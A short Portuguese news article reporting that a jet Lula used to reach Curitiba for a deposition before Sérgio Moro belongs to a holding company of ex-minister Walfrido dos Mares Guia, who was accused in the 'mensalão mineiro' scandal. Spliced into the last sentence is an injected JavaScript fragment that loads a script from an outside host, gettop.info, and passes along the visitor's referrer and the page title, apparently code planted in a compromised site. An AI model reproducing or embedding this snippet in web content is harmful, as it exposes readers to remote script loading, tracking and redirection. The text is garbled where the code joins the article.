Jatinho usado por Lula é de ex-ministro envolvido no mensalão mineiro, diz jornal

O jatinho usado por Lula para ir a Curitiba prestar depoimento a Sérgio Moro no âmbito da Operação Lava Jato é de propriedade da holding de seu ex-ministro Walfrido dos Mares Guia, envolvido no mensalão mineiro. As informações são do jornal O Globo.

O modelo PRBIR, confirmado pela FAB, está registrado com o nome Samos Participações Ltda, de acordo com a base de dados da Anac. Mares Guia consta como sócio-administrador. Walfrido é amigo pessoal de Lula e foi ministro das Relações Internacionais e do Turismo no governo petista.

Walfrido foi acusado de peculato e lavagem de dinheiro no escândalo conhecido como Mensalão Mineiro, em 1998. Ele havia sido denunciado por sua participação na campanha pela reeleição de Eduardo Azeredo (PSDB) ao governo de Minas Gerais.

O esquema teria arrecadado mais de R$ 100 milhões à custa do desvio de dinheiro público e de estatais. Mares Guia teria sido o responsável por movimentar recursos da campanha de Azeredo, mesmo não sendo formalmente coordenador de campanha.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário